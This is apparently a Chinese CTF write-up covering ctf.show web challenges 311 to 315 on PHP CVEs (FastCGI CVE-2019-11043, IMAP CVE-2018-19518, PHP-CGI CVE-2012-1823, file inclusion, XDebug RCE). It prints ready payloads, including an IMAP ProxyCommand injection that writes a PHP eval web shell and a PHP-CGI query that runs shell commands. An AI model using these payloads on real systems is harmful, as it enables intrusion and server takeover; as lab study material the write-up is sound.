ctf_show笔记篇(web入门---phpCVE)

news/2024/5/19 23:40:39 标签: 笔记, 安全, web安全, php, ctf

web311:  CVE-2019-11043远程代码执行漏洞

漏洞名称:php fastcgi 远程命令执行漏洞

涉及版本:7.1.x-7.1.33        7.2.x-7.2.24     7.3.x-7.3.11

poc:neex/phuip-fpizdam:利用 CVE-2019-11043 (github.com)

漏洞成因:
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行

使用插件能看到语言版本是php7.1.33,或者去看返回包也可以

这里我直接使用的dockers拉取的镜像,不用去搭建环境比较方便

url结尾需要加index.php

最后执行命令,在url最后加?a=id这些就可以执行,需要多访问几次,一般访问三四次执行一次

web312:CVE-2018-19518远程命令执行漏洞

漏洞名称:PHP IMAP远程命令执行漏洞

涉及版本:5.6.0-5.6.38    7.0.0-7.0.32    7.1.0-7.1.24

漏洞介绍:

imap_open()允许通过mailbox参数运行任意shell命令

payload:

x+-oProxyCommand=echo 'base64编码后的命令'|base64 -d|sh}

<?php eval($_POST[a]);?>base64编码一下PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+

将poc base64编码

echo 'PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+' | base64 -d > /var/www/html/1.php

ZWNobyAnUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiWVYwcE96OCsnfGJhc2U2NCAtZCA+IC92YXIvd3d3L2h0bWwvMS5waHA=

然后插入到payload里

x+-oProxyCommand=echo ZWNobyAnUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiWVYwcE96OCsnfGJhc2U2NCAtZCA+IC92YXIvd3d3L2h0bWwvMS5waHA=|base64 -d|sh}

最后在url编码一下

x%2b-oProxyCommand%3decho+ZWNobyAnUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiWVYwcE96OCsnfGJhc2U2NCAtZCA%2bIC92YXIvd3d3L2h0bWwvMS5waHA%3d%7cbase64+-d%7csh%7d

web313:  CVE-2012-1823远程代码执行漏洞

漏洞名称:PHP-CGI远程代码执行漏洞

PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析 | 离别歌 (leavesongs.com)

poc:

/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input


<?= `cat /somewhere/fla9.txt`;?>

web314:  文件包含漏洞,简单包含一下日志文件执行命令就能拿到flag

web315:XDebug 远程调试漏洞

详情以及payload可以自行下载

vulhub/php/xdebug-rce at master · vulhub/vulhub (github.com)

XDebug是PHP的一个扩展,用于调试PHP代码。如果目标开启了远程调试模式,并设置remote_connect_back = 1

xdebug.remote_connect_back = 1
xdebug.remote_enable = 1

这个配置下,我们访问http://target/index.php?XDEBUG_SESSION_START=phpstorm,目标服务器的XDebug将会连接访问者的IP(或X-Forwarded-For头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。

大致理解起来就是如果开启了xdebug的远程调试功能就能利用xdebug提供的eval去执行命令

这个类似于反弹shell,  运行poc回去监听某个端口,  需要外网ip去做一个映射内网ip才能监听成功

不然会超时


http://www.niftyadmin.cn/n/5446448.html

相关文章

Modbus TCP转Profinet网关如何实现Modbus主站与多设备通讯

在工业控制领域中&#xff0c;Modbus TCP转Profinet网关&#xff08;XD-ETHPN20&#xff09;扮演着连接不同设备间通讯的重要角色。当将Modbus主站与十几台服务器进行通讯时&#xff0c;通过modbus tcp转profinet网关&#xff08;XD-ETHPN20&#xff09;设备将不同协议间的数据…

使用docker搭建Fluentd的教程

使用Docker搭建Fluentd的教程 步骤 1: 拉取Fluentd镜像 首先&#xff0c;需要从Docker Hub上拉取Fluentd的官方镜像&#xff1a; docker pull fluent/fluentd:v1.14-debian-1这里使用的是基于Debian的Fluentd 1.14版本的镜像&#xff0c;可以根据需要选择其他版本。 步骤 2…

软考 网络工程师 每日学习打卡 2024/3/22

学习内容 第9章 网络操作系统与应用服务器 本章主要讲解&#xff1a;了Windows和Linux操作系统的基础知识&#xff0c;并详细讲述了常用的各种服务器的 配置方法。这一章的内容主要是在具体操作方面&#xff0c;网络工程师要能够熟练地配置各种网络服务 器&#xff0c;排除网络…

postman下载汉化以及使用

【2023全网最牛教程】10分钟快速上手Postman&#xff08;建议收藏&#xff09;_macbook postman打开慢-CSDN博客 Postman 汉化教程&#xff08;小白&#xff09;配置的具体操作_postman怎么设置中文-CSDN博客 上面是两篇参考的博客 postman是一款支持http协议的接口调试与测试…

数据格式化方法

首先你需要一个可以展示代码的组件&#xff1b; 我使用的是tech-ui(内部组件库)&#xff1b; 你如果没有类似的组件&#xff0c;可以参考以下链接替代&#xff1a; react-monaco-editor -- 代码编辑器(适用Umi)_umi monaco editor-CSDN博客 Codemirror -- 代码编辑器(react…

【CMake】所见所闻所学

Note: 本贴仅记录遇到的CMake的问题&#xff0c;以问题为驱动。 - cmake_minimum_required - project - add_executable - target_include_directories - ExternalProject_Add ExternalProject_Add 是 CMake 中用于管理和构建外部项目的模块。通过 ExternalProject_Add&…

一文搞懂Log4j2的同步日志打印

前言 Log4j2诞生于2012年&#xff0c;是Apache推出用于对标Logback的日志框架&#xff0c;本篇文章将对Log4j2的同步日志打印的源码进行学习。 Log4j2版本&#xff1a;2.17.1 正文 一. Logger获取 通常&#xff0c;使用Slf4j的LoggerFactory获取Log4j2的Logger的代码如下所…

ChatGPT:智能论文写作指南,让您成为写作高手

ChatGPT无限次数:点击直达 写作是学术研究中不可或缺的一环&#xff0c;然而&#xff0c;对于许多人来说&#xff0c;写作往往是一项艰巨而费时的任务。但是&#xff0c;现在有了ChatGPT&#xff0c;您将能够以前所未有的速度和准确性编写高质量的论文。本文将向您介绍如何利用…